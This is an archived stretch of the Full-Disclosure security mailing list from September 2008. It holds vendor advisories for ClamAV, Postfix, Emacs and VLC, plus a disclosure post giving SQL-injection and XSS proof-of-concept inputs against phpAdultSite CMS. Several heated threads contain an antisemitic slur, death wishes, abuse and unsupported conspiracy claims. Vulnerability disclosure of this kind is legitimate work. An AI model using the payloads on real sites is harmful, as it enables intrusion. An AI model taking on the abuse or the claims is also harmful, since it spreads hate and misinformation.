Clamav: Multiple Vulnerabilities Message-ID: <48C1D8F7.1080401@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-39 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-06 Severity: 3 Type: Remote ------------------------------------------------------------------------ Summary ======= There has been discovered multiple vulnerabilities in Clamav including a DoS (Denial of Service) vulnerability and memory leaks. Description =========== The first vulnerability is caused due to an error in libclamav/chmunpack.c when processing malformed CHM files. This can be exploited to cause an invalid memory access via a specially crafted CHM file. Others as follow: * Out-of-memory null dereference (bb#1141) CVE-2008-3912 * Possible invalid memory access (bb#1089) CVE-2008-1389 * Error path memory leaks CVE-2008-3913 * Fd leaks (bb#1141) CVE-2008-3914 Affected packages: Pardus 2008: clamav, all before 0.93.3-28-2 Pardus 2007: clamav, all before 0.93.3-30-29 Resolution ========== There are update(s) for clamav. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up clamav Pardus 2007: pisi up clamav References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8110 * http://int21.de/cve/CVE-2008-1389-clamav-chd.html * http://secunia.com/advisories/31725 ------------------------------------------------------------------------ -- P?nar Yanarda? Pardus Security Team http://security.pardus.org.tr From pinar at pardus.org.tr Sat Sep 6 02:12:34 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Sat, 06 Sep 2008 04:12:34 +0300 Subject: [Full-disclosure] [PLSA 2008-40] Postfix: Denial of Service Message-ID: <48C1D902.1070102@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-40 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-06 Severity: 1 Type: Local ------------------------------------------------------------------------ Summary ======= A security issue has been reported in Postfix, which can be exploited by malicious, local users to cause a DoS (Denial of Service). Description =========== The security issue is caused due to Postfix leaking the epoll file descriptor when executing non-Postfix commands, which can be exploited to cause a DoS. The security issue only affects Postfix 2.4 or later in combination with epoll (e.g. Linux 2.6). Affected packages: Pardus 2008: postfix, all before 2.5.4-21-5 Resolution ========== There are update(s) for postfix. You can update them via Package Manager or with a single command from console: pisi up postfix References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8114 * http://www.postfix.org/announcements/20080902.html * http://secunia.com/advisories/31716/ ------------------------------------------------------------------------ -- P?nar Yanarda? Pardus Security Team http://security.pardus.org.tr From pinar at pardus.org.tr Sat Sep 6 02:13:06 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Sat, 06 Sep 2008 04:13:06 +0300 Subject: [Full-disclosure] [PLSA 2008-41] Emacs: Malicious code execution Message-ID: <48C1D922.6090301@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-41 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-06 Severity: 2 Type: Remote ------------------------------------------------------------------------ Summary ======= Romain Francoise has found a security risk in a feature of GNU Emacs related to how Emacs interacts with Python. Description =========== The vulnerability may allow an attacker to run malicious code if the user runs the Emacs command `run-python' while the current directory is world-writable, or if the user toggles `eldoc-mode' and visits a Python source file in a world-writable directory. Affected packages: Pardus 2008: emacs, all before 23.0.60_20080624-22-6 Pardus 2007: emacs, all before 22.1-17-17 Resolution ========== There are update(s) for emacs. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up emacs Pardus 2007: pisi up emacs References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8128 * http://lists.gnu.org/archive/html/emacs-devel/2008-09/msg00215.html * http://www.opensubscriber.com/message/emacs-diffs at gnu.org/9983157.html ------------------------------------------------------------------------ -- P?nar Yanarda? Pardus Security Team http://security.pardus.org.tr From www417 at gmail.com Sat Sep 6 07:31:12 2008 From: www417 at gmail.com (www417) Date: Sat, 6 Sep 2008 14:31:12 +0800 Subject: [Full-disclosure] XCon 2008 Call for Paper In-Reply-To: <d65cd4390809050141x73891019x632b5f16b63e9d57@mail.gmail.com> References: <d65cd4390809050045k7037cba7g7bb8de93e5e44f5@mail.gmail.com> <d65cd4390809050140g5c40303h7bce51edd4589db@mail.gmail.com> <d65cd4390809050141x73891019x632b5f16b63e9d57@mail.gmail.com> Message-ID: <3fdc4e940809052331v44d8fe93h4dd7d689236c8cc1@mail.gmail.com> Looks like it is so interesting, thanks Sowhat. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080906/b7e43966/attachment.html From xploitable at gmail.com Sat Sep 6 18:43:31 2008 From: xploitable at gmail.com (n3td3v) Date: Sat, 6 Sep 2008 18:43:31 +0100 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> Message-ID: <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> On Sat, Sep 6, 2008 at 1:22 AM, n3td3v <xploitable at gmail.com> wrote: > Here is the Marcus Sachs Youtube video, I forgot to add it > http://www.youtube.com/watch?v=FSUPTZVlkyU > > Maybe the Gary Mckinnon lawyers could use it to prove the U.S mind set > right now as a last ditch hope. > > We can't allow a man to goto jail for life, if the reason is only for > Marcus Sachs to get cyber security funding and power, thats just > sickening. > > http://freegary.org.uk/ > > All the best, > > n3td3v > Hi Free Gary website, Consider adding the Marcus Sachs Youtube video onto the Free Gary blog as a case against sending Gary to the U.S. during the election season, which would only see Glasgow-born Gary paraded on CNN and Fox News during election coverage. :( I would like to see what your readers think about the video and Marcus Sachs's media agenda. http://www.youtube.com/watch?v=FSUPTZVlkyU >From one Scot to another, I wish Gary luck and best wishes to his friends and family, you have my sympathy at this difficult time. After seeing the Youtube video, the timing and reason for fast tracking Gary is known more now than ever, and we have no doubt about Marcus Sachs and his intentions to use this fine Scottish born lad as a political baseball to score a home run. The Scots, we stick together in times of hardships, and this is one of those times that Gary needs friends and support from the security community more than ever. Please print these emails out for Gary to read, and download the Youtube video file onto a medium that he will be able to watch without his computer-use restriction order being breached. Here is a tool that will allow you to do it: http://www.download.com/YouTube-Downloader/3000-2071_4-10647340.html All the best, n3td3v From fernando.gont at gmail.com Sun Sep 7 05:31:48 2008 From: fernando.gont at gmail.com (Fernando Gont) Date: Sun, 07 Sep 2008 01:31:48 -0300 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: <20080904003920.d64a5495.jerome.benoit@grenouille.com> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <20080904003920.d64a5495.jerome.benoit@grenouille.com> Message-ID: <48c35aa3.1b36640a.1c4f.080b@mx.google.com> At 07:39 p.m. 03/09/2008, Jerome Benoit wrote: > > We have published a revision of our IETF Internet-Draft about port > > randomization. It is available at: > > http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-rand > > omization-02.txt (you can find the document in other fancy formats at: > > http://www.gont.com.ar/drafts/port-randomization/index.html) > > > >Hi, > >I'm still wondering how much overhead algorithm #3 and #4 add ... >Did someone have done some tests ? This is a good point. Well....in the case of algorithm #3, that depends on the hash function you use for F(). In the case of algorithm #4, that depends on the hash function you use for F() and the hash function you use for G(). FWIW, Linux implements algorithm #3, so you could measure the performance of that algorithm already. P.S.: If you care about the performance implications, that's probably because you are issuing a large number of connection requests. In that case, algorithms #1 and #2 are probably not a choice, as they are likely to lead to a large number of connection-id collisions. And, if your connection requests are being issued to different hosts or services, algorithm #4 will have a better port reuse frequency that even the traditional BSD port selection algorithm, thus probably avoiding some collisions that you would have experienced with the traditional BSD port selection algorithm. Thanks! Kind regards, -- Fernando Gont e-mail: fernando at gont.com.ar || fgont at acm.org PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 From py at gentoo.org Sun Sep 7 20:21:51 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Sun, 07 Sep 2008 21:21:51 +0200 Subject: [Full-disclosure] [ GLSA 200809-06 ] VLC: Multiple vulnerabilities Message-ID: <48C429CF.6090307@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200809-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: VLC: Multiple vulnerabilities Date: September 07, 2008 Bugs: #235238, #235589 ID: 200809-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Two vulnerabilities in VLC may lead to the remote execution of arbitrary code. Background ========== VLC is a cross-platform media player and streaming server. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-video/vlc < 0.8.6i-r2 >= 0.8.6i-r2 Description =========== g_ reported the following vulnerabilities: * An integer overflow leading to a heap-based buffer overflow in the Open() function in modules/demux/tta.c (CVE-2008-3732). * A signedness error leading to a stack-based buffer overflow in the mms_ReceiveCommand() function in modules/access/mms/mmstu.c (CVE-2008-3794). Impact ====== A remote attacker could entice a user to open a specially crafted file, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All VLC users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-video/vlc-0.8.6i-r2" References ========== [ 1 ] CVE-2008-3732 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3732 [ 2 ] CVE-2008-3794 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3794 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200809-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 260 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080907/021e2807/attachment.bin From smok3f00 at gmail.com Sun Sep 7 18:20:20 2008 From: smok3f00 at gmail.com (SmOk3) Date: Sun, 7 Sep 2008 18:20:20 +0100 Subject: [Full-disclosure] phpAdultSite CMS flaws Message-ID: <1f9bad3a0809071020u5d202f7et7629d0ec4a0c8d3d@mail.gmail.com> Original article: http://www.davidsopas.com/2008/09/phpadult-cms-exploit/ phpAdultSite CMS is a PHP-based content management system for a adult pay site that fully supports MySQL. The code, layout, graphics of phpAdultSite are consistent through every single page of your site. It costs between $400 to $1100 depending on the license. I found that this script is vulnerable to a couple of topics. After no reply of this CMS vendors, send about two emails 1 week ago, I decided going to full disclosure. The problem exists on results_per_page variable. If it returns false, it gives a DB Error output on our browser, showing up path disclosure, sql statments that may lead to sql injections and also, it executes XSS attacks. PoC: index.php?&results_per_page=50' index.php?&results_per_page=50"><script type="text/javascript">alert(/XSS vuln by DavidSopas.com/)</script> It can be fixed with the sanitize of the variable. From nytrokiss at gmail.com Sun Sep 7 22:26:02 2008 From: nytrokiss at gmail.com (James Matthews) Date: Sun, 7 Sep 2008 14:26:02 -0700 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> Message-ID: <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> It's cheaper for them to scare people away then secure their systems! On Sat, Sep 6, 2008 at 10:43 AM, n3td3v <xploitable at gmail.com> wrote: > On Sat, Sep 6, 2008 at 1:22 AM, n3td3v <xploitable at gmail.com> wrote: > > Here is the Marcus Sachs Youtube video, I forgot to add it > > http://www.youtube.com/watch?v=FSUPTZVlkyU > > > > Maybe the Gary Mckinnon lawyers could use it to prove the U.S mind set > > right now as a last ditch hope. > > > > We can't allow a man to goto jail for life, if the reason is only for > > Marcus Sachs to get cyber security funding and power, thats just > > sickening. > > > > http://freegary.org.uk/ > > > > All the best, > > > > n3td3v > > > > Hi Free Gary website, > > Consider adding the Marcus Sachs Youtube video onto the Free Gary blog > as a case against sending Gary to the U.S. during the election season, > which would only see Glasgow-born Gary paraded on CNN and Fox News > during election coverage. :( > > I would like to see what your readers think about the video and Marcus > Sachs's media agenda. > > http://www.youtube.com/watch?v=FSUPTZVlkyU > > >From one Scot to another, I wish Gary luck and best wishes to his > friends and family, you have my sympathy at this difficult time. > > After seeing the Youtube video, the timing and reason for fast > tracking Gary is known more now than ever, and we have no doubt about > Marcus Sachs and his intentions to use this fine Scottish born lad as > a political baseball to score a home run. > > The Scots, we stick together in times of hardships, and this is one of > those times that Gary needs friends and support from the security > community more than ever. > > Please print these emails out for Gary to read, and download the > Youtube video file onto a medium that he will be able to watch without > his computer-use restriction order being breached. > > Here is a tool that will allow you to do it: > http://www.download.com/YouTube-Downloader/3000-2071_4-10647340.html > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- http://www.goldwatches.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080907/06242158/attachment.html From xploitable at gmail.com Sun Sep 7 22:57:11 2008 From: xploitable at gmail.com (n3td3v) Date: Sun, 7 Sep 2008 22:57:11 +0100 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> Message-ID: <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> On Sun, Sep 7, 2008 at 10:26 PM, James Matthews <nytrokiss at gmail.com> wrote: > It's cheaper for them to scare people away then secure their systems! > How much will it cost to fly him over to U.S, keep him in prison, watered and fed? Is the U.S not already in a recession, have they really got the money to ramp up somebody's crime to give a false impression to the presidency that computer hacking needs to be a national security agenda for the next administration to worry about?.... really I don't think hackers are a national security item for a president to worry about... All the best, n3td3v From xploitable at gmail.com Mon Sep 8 01:04:41 2008 From: xploitable at gmail.com (n3td3v) Date: Mon, 8 Sep 2008 01:04:41 +0100 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> Message-ID: <4b6ee9310809071704o75a45d6ar260ca78fa7a090ff@mail.gmail.com> On Sun, Sep 7, 2008 at 10:57 PM, n3td3v <xploitable at gmail.com> wrote: > really I don't think hackers are a national security item > for a president to worry about... > Marcus Sachs and his cronies don't care though, they want to artificially ramp up cyber security, no matter how much the cost or disruption... to them cyber security is a national security agenda, and they want to convince the average joe it is as well. Bringing Gary Mckinnon to U.S is a god send gift for him. He'll be able to get Gary Mckinnon onto every television screen in U.S during election time, influence middle America, all the areas of America he needs to convince about cyber security, get the voting public onside, a better job than he managed to do with Die Hard 4. All the best, n3td3v From ureleet at gmail.com Mon Sep 8 02:28:24 2008 From: ureleet at gmail.com (Ureleet) Date: Sun, 7 Sep 2008 21:28:24 -0400 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <4b6ee9310809071704o75a45d6ar260ca78fa7a090ff@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> <8a6b8e350809071426ia10f292r2c98ebe74fc398ad@mail.gmail.com> <4b6ee9310809071457r31d967f2y16116fbccf4a2677@mail.gmail.com> <4b6ee9310809071704o75a45d6ar260ca78fa7a090ff@mail.gmail.com> Message-ID: <6158bb410809071828y2ee1a370m44eb6d628c58ad6e@mail.gmail.com> sorry, i been on vacation. back now bitches! n3td3v... u hav sumthing to hide? as much as i think sachs is full of it 2, it doesnt meant he wants to take over the world. u still dont know mckinnons method, which i asked u to elaborate on months ago. we're still waiting. On Sun, Sep 7, 2008 at 8:04 PM, n3td3v <xploitable at gmail.com> wrote: > On Sun, Sep 7, 2008 at 10:57 PM, n3td3v <xploitable at gmail.com> wrote: >> really I don't think hackers are a national security item >> for a president to worry about... >> > > Marcus Sachs and his cronies don't care though, they want to > artificially ramp up cyber security, no matter how much the cost or > disruption... to them cyber security is a national security agenda, > and they want to convince the average joe it is as well. Bringing Gary > Mckinnon to U.S is a god send gift for him. He'll be able to get Gary > Mckinnon onto every television screen in U.S during election time, > influence middle America, all the areas of America he needs to > convince about cyber security, get the voting public onside, a better > job than he managed to do with Die Hard 4. > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Mon Sep 8 02:29:40 2008 From: ureleet at gmail.com (Ureleet) Date: Sun, 7 Sep 2008 21:29:40 -0400 Subject: [Full-disclosure] n3td3v's dick is bigger than Gadis WAS: Google Chrome Browser Vulnerability Message-ID: <6158bb410809071829m5bc6b0afr4bdf663932af4756@mail.gmail.com> how teh fuck is this on topic with the subject? allow me to fix the subject line 4 u. On Fri, Sep 5, 2008 at 4:53 PM, n3td3v <xploitable at gmail.com> wrote: > On Fri, Sep 5, 2008 at 8:10 PM, hannibal <hannibal at switched.com> wrote: >> We all know that Evron is a moronic jew, who cares? >> > > How should the community deal with Gadi Evron emails? Should we be > shooting for a complete ban of cyber politics as well as normal > politics which is already banned? > > If people want to talk cyber politics then the community could setup a > cyber-politics mailing list so we can rant to each other all day about > cyber politics. > > And it would get Gadi Evron and n3td3v off Full-Disclosure, and thats > got to be a good thing. > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Mon Sep 8 02:30:23 2008 From: ureleet at gmail.com (Ureleet) Date: Sun, 7 Sep 2008 21:30:23 -0400 Subject: [Full-disclosure] Monthly Hands-On Meetups In-Reply-To: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com> References: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com> Message-ID: <6158bb410809071830w2418cb3aqfbb5b5c34d9572fe@mail.gmail.com> so u just want to meet n3td3v and flogg him publically? sounds good. On Sun, Aug 31, 2008 at 5:19 PM, Professor Micheal Chatner <mchatner at gmail.com> wrote: > Hey Guys, > > I was wondering if anyone would like to start something like a > Full-Disclosure monthly group in cities all over the world. It could > be like 2600 meetings except with real security professionals because > personally I don't want to even talk to someone unless they have a CEH > cert. > > I just started a new job in digital forensics. It would be fun to meet > other people who like hacking and trading Ubuntu tips and tricks! > > Let me know what you think! > Professor Micheal Chatner, M.D., CISSP > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Mon Sep 8 02:38:52 2008 From: ureleet at gmail.com (Ureleet) Date: Sun, 7 Sep 2008 21:38:52 -0400 Subject: [Full-disclosure] security news on cnet??? In-Reply-To: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com> References: <4b6ee9310809021107p60f02f4fl7bf9c54c5068037c@mail.gmail.com> Message-ID: <6158bb410809071838r51c2e993rb3d2b0b652f115e7@mail.gmail.com> is that okay for a writer to take vacation you fucktard? die. On Tue, Sep 2, 2008 at 2:07 PM, n3td3v <xploitable at gmail.com> wrote: > you've not post any security news all week, what's going on cnet??? is > the journalist that does the security news off ill??? > > :( > > yours, > > cnet fan > > -- > https://groups.google.com/group/n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Mon Sep 8 02:40:12 2008 From: ureleet at gmail.com (Ureleet) Date: Sun, 7 Sep 2008 21:40:12 -0400 Subject: [Full-disclosure] die In-Reply-To: <4b6ee9310809021533i4c4b8d01l822b7520dcecc6e3@mail.gmail.com> References: <2d792fb20809021359u3f07b51cmc1d08cca144eb92f@mail.gmail.com> <C4E2F93B.15AC79%maillists@thelonecoder.com> <4b6ee9310809021533i4c4b8d01l822b7520dcecc6e3@mail.gmail.com> Message-ID: <6158bb410809071840x43e38fe7oa6b0ff699fd63b68@mail.gmail.com> waaaaaaaaa. marc's penis is bigger than mine. i cant figure out youtube to upload my own video of a speech... waaaaaaaa... oh yeah, thats cause i am not invited to give speeches like marc.... waaaaaaaa... --n3td3v On Tue, Sep 2, 2008 at 6:33 PM, n3td3v <xploitable at gmail.com> wrote: > On Tue, Sep 2, 2008 at 10:07 PM, Stephen Johnson > <maillists at thelonecoder.com> wrote: >> >>> Subject: Re: [Full-disclosure] die >>> >>> >>>> Who do you think you are, Gadi Evron or something? Don't tell people what to >>>> do. >>>> >>> >>> Who do you think you are, Gadi Evron or something? Don't tell people what to >>> do. >> >> Firefox has detected that the server is redirecting the request for this >> address in a way that will never complete >> > > As long as Marcus Sachs doesn't make cyber security a national > security agenda as the next administration is coming in. n3td3v saw > that as a real threat to other countries national security > specifically the United Kingdom, and as such I am on false flag alert. > I'm convinced Marcus Sachs is hungry for power in Washington to do > with cyber security. > > I think thats what was behind his senseless domain name reportage on > the Sans Dairy, he wanted to put cyber security infront of the next > administration as it is coming in. He thought Gustav was gonna be a > major cat 4, cat 5 hurricane and thought this is a perfect way to put > cyber security infront of the next next administration as they are > coming in. Unfortunately for him his postings of domain names just > turned into an alert board for the cyber criminals and helped them in > knowing which domains not to use in cyber attacks. Plus the hurricane > ended up making landfall on the Gulf Coast as a cat 2, cat 1 > hurricane, so made his attempts to artificially ramp up cyber security > as a national security agenda a damp squid. > > Although there is a flaw in his thinking, why make something a > national security agenda when it isn't one? And thats what worries me. > Why not let it naturally be a national security agenda or not be a > natural national security agenda, why do you need to ramp something up > to be a national security agenda when it isn't one? > > Cyber security isn't a national security agenda, but folks like Marcus > Sachs want it to be one, so he can gain control of "cyber" in > Washington. > > This is what i'm afraid of and Marcus Sachs and whoever he is related > to need to be watched closely, I seen that Youtube video as a real > threat and i'm keeping a close eye on him and any future dialog he > outputs into the security community and wider world. > > Gadi Evron is small fry in comparison to Marcus Sachs, although Gadi > is power hungry and could become a national security threat, he isn't > right now, the real concern is that of Marcus Sachs and the Cnet News > Youtube clip that mentions he or people he has obviously been having > discussions with behind the scenes are wanting to artificially ramp up > cyber security in timing with Obama or McCain getting into the White > House, either so Marcus Sachs or his associates can A) Grab front > focus power for the next four years, B) Get funding for various > "projects" they deem as important. > > When you've got big leaders talking about influencing the next > administration as they are coming in to a bunch of folks at Black Hat > 2008, it really sends alarm bells ringing, I just hope the guy is > being wiretapped. > > Sure, Gadi Evron is power hungry, but there are bigger fish to fry... > Marcus Sachs. > > http://www.youtube.com/watch?v=FSUPTZVlkyU > > We need to get the full video of the Youtube video link i've post > above put online, does Cnet News have the full video of the > presentation? If so post it onto Youtube. > > Also, if Blackhat.com have the full video of the presentation, please > post it online. > > Can everyone keep an eye on > https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html#Sachs > and email me when and if the video full appears there, we need to > track this guy and keep an eye on him. > > If I ever get into MI5, i'll be focusing all my efforts on Sachs, so I > hope the people who do work in MI5 keep an eye on Sachs in the run up > to the election and beyond. > > Gadi is only causing collateral damage right now, by him pumping out > about Estonia and Georgia being blamed on Russia and the news > journalists believing that, when really both of those incidents were > the work of the U.S government. > > The other governments can put up with Gadi's bot net claims and what > appears in the media because of him, because its not really his fault > unless the CIA have leaned on Mossad, to lean on Gadi Evron, to post > on the internet who is to blame for Estonia, Georgia and whatever else > Sachs and company may have planned to artificially ramp up cyber > security as a national security agenda as the next president is coming > in, (See Youtube video for Marcus Sachs quotes). > > All the best, > > n3td3v > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Mon Sep 8 02:41:29 2008 From: ureleet at gmail.com (Ureleet) Date: Sun, 7 Sep 2008 21:41:29 -0400 Subject: [Full-disclosure] [funsec] Internet attacks against Georgian web s ites In-Reply-To: <4b6ee9310808281242n27ccee1cx4dabe5621d324ea9@mail.gmail.com> References: <20080818090256.4DD352003D@mailserver7.hushmail.com> <8f1f7b60808180543w18ce6ddasb2944db0a3298533@mail.gmail.com> <11005.1219073952@turing-police.cc.vt.edu> <1219077827.8558.51.camel@hextic-desktop> <48A9B2CA.4010602@fred.net> <1219090531.6511.0.camel@hextic-desktop> <4b6ee9310808281233x6132b469i1f9d035d25eb3639@mail.gmail.com> <4b6ee9310808281242n27ccee1cx4dabe5621d324ea9@mail.gmail.com> Message-ID: <6158bb410809071841y7a5b3e4eqd9545bb608c3bef8@mail.gmail.com> drink yourself to death. thank you. On Thu, Aug 28, 2008 at 3:42 PM, n3td3v <xploitable at gmail.com> wrote: > On Thu, Aug 28, 2008 at 8:33 PM, n3td3v <xploitable at gmail.com> wrote: >> Putin blames US for Georgia role >> >> Russian Prime Minister Vladimir Putin has accused the US of provoking >> the conflict in Georgia, possibly for domestic election purposes. >> >> Mr Putin told CNN US citizens were "in the area" during the conflict >> over South Ossetia and were "taking direct orders from their leaders". >> >> He said his defence officials had told him the provocation was to >> benefit one of the US presidential candidates. >> >> The White House dismissed the allegations as "not rational". >> >> http://news.bbc.co.uk/1/hi/world/europe/7586605.stm >> > > "The suspicion arises that someone in the United States especially > created this conflict with the aim of making the situation more tense > and creating a competitive advantage for one of the candidates > fighting for the post of US president." > > White House spokeswoman Dana Perino rejected the allegation. > > "To suggest that the United States orchestrated this on behalf of a > political candidate - it sounds not rational," she said. > > http://news.bbc.co.uk/1/hi/world/europe/7586605.stm > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From biz.marqee at gmail.com Mon Sep 8 05:26:34 2008 From: biz.marqee at gmail.com (Biz Marqee) Date: Mon, 8 Sep 2008 14:26:34 +1000 Subject: [Full-disclosure] McKinnon a 'scapegoat for Pentagon insecurity' In-Reply-To: <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> References: <4b6ee9310809051636g38329f5elb50c9ca3497683a6@mail.gmail.com> <4b6ee9310809051722w7a27f20dt33951319aed18ddb@mail.gmail.com> <4b6ee9310809061043i7536b628x4fac8077194cd452@mail.gmail.com> Message-ID: <a741a45f0809072126n3646512budd1adfb65e13474e@mail.gmail.com> While I think the US/media is making too much out of this (he was just some sucker scanning for Adminstrator/NULL and installing pcanywhere) I dont see why we should care too much, he is a nobody - just some overaged kiddie with a scanner and some downloaded exez. He didnt use any skill and as best I can tell (from the media) he didnt access anything interesting except for an image of a UFO (of which, suprise suprise, he has no proof). Stop trying to turn him into the next mitnick, the community wont rally around some dumbfuck whos skill set it limited to some prebuilt programs he prob got from zoneh forums. Eat shit and die, b1zm4rq On Sun, Sep 7, 2008 at 3:43 AM, n3td3v <xploitable at gmail.com> wrote: > On Sat, Sep 6, 2008 at 1:22 AM, n3td3v <xploitable at gmail.com> wrote: > > Here is the Marcus Sachs Youtube video, I forgot to add it > > http://www.youtube.com/watch?v=FSUPTZVlkyU > > > > Maybe the Gary Mckinnon lawyers could use it to prove the U.S mind set > > right now as a last ditch hope. > > > > We can't allow a man to goto jail for life, if the reason is only for > > Marcus Sachs to get cyber security funding and power, thats just > > sickening. > > > > http://freegary.org.uk/ > > > > All the best, > > > > n3td3v > > > > Hi Free Gary website, > > Consider adding the Marcus Sachs Youtube video onto the Free Gary blog > as a case against sending Gary to the U.S. during the election season, > which would only see Glasgow-born Gary paraded on CNN and Fox News > during election coverage. :( > > I would like to see what your readers think about the video and Marcus > Sachs's media agenda. > > http://www.youtube.com/watch?v=FSUPTZVlkyU > > >From one Scot to another, I wish Gary luck and best wishes to his > friends and family, you have my sympathy at this difficult time. > > After seeing the Youtube video, the timing and reason for fast > tracking Gary is known more now than ever, and we have no doubt about > Marcus Sachs and his intentions to use this fine Scottish born lad as > a political baseball to score a home run. > > The Scots, we stick together in times of hardships, and this is one of > those times that Gary needs friends and support from the security > community more than ever. > > Please print these emails out for Gary to read, and download the > Youtube video file onto a medium that 